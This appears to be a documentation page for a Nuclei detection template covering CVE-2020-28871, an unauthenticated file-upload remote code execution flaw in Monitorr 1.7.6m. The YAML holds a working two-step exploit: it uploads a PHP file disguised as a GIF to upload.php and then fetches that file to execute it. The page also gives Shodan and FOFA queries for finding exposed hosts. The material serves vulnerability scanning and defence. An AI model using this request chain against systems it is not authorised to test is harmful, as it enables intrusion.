Monitorr 1.7.6m - Unauthenticated Remote Code Execution
ID: CVE-2020-28871
Severity: critical
Author: gy741
Tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorr
Description
Section titled “Description”Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr.
YAML Source
Section titled “YAML Source”id: CVE-2020-28871
info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected system. remediation: | Upgrade to a patched version of Monitorr or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/48980 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - http://packetstormsecurity.com/files/163263/Monitorr-1.7.6m-Bypass-Information-Disclosure-Shell-Upload.html - http://packetstormsecurity.com/files/170974/Monitorr-1.7.6-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 epss-score: 0.96887 epss-percentile: 0.99706 cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 vendor: monitorr product: monitorr shodan-query: http.favicon.hash:"-211006074" fofa-query: icon_hash="-211006074" tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project,monitorrvariables: string: "CVE-2020-28871"
http: - raw: - | POST /assets/php/upload.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: text/plain, */*; q=0.01 Connection: close Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 Origin: http://{{Hostname}} Referer: http://{{Hostname}}
-----------------------------31046105003900160576454225745 Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Type: image/gif
GIF89a213213123<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------31046105003900160576454225745-- - | GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body_2 words: - '{{md5(string)}}'
- type: status status: - 200# digest: 4b0a00483046022100995933100546a4f0a089f6920c72621802d76236c1bf6336544cb2706e2ed7c5022100e8db5aff3fb00d1eefb6327862de7f8d71d5f8461f6c26e7c605a75b572d2ff7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28871.yaml"